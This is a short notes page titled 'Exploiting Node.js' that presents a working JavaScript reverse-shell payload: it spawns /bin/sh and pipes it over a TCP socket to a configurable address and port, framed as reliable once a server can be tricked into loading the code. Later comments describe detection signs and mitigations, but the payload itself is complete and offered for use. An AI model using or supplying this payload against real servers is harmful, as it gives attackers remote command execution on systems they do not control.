Exploiting Node.js
- author:: Nathan Acks
- date:: 2021-10-09
The hard part of popping a reverse shell on a Node.js server is tricking the server into loading your code. If you can figure out how to do that, this seems to produce a reliable connection:
// Reverse-shell payload as quoted on the page: opens a TCP socket to the
// address below and wires a local /bin/sh to it. Left byte-identical;
// the comments add the defender's reading of each step.
(function(){
// Built-in networking and process-spawning modules, then a shell started
// with no arguments. A Node.js server process spawning /bin/sh is the first
// observable for detection (process-tree / EDR telemetry on the host).
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
// Outbound connection to port 1234 at 127.0.0.1 (the page's example values).
// An unexpected outbound connection from the server process is the second
// observable; egress filtering on the host or network blocks this step.
client.connect(1234, "127.0.0.1", function(){
// Customize port and IP address above to taste
// Bidirectional wiring: bytes from the socket feed the shell's stdin,
// and the shell's stdout and stderr are sent back over the socket.
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
// The real fix is upstream of this snippet: the page notes the hard part is
// getting the server to load attacker-controlled code at all, so preventing
// that (no evaluation of untrusted input, verified dependencies) is the
// mitigation. NOTE(review): the author's comment below is kept as written;
// why a regex literal is returned is not shown on the page — confirm.
return /a/; // Prevents Node.js from crashing
})();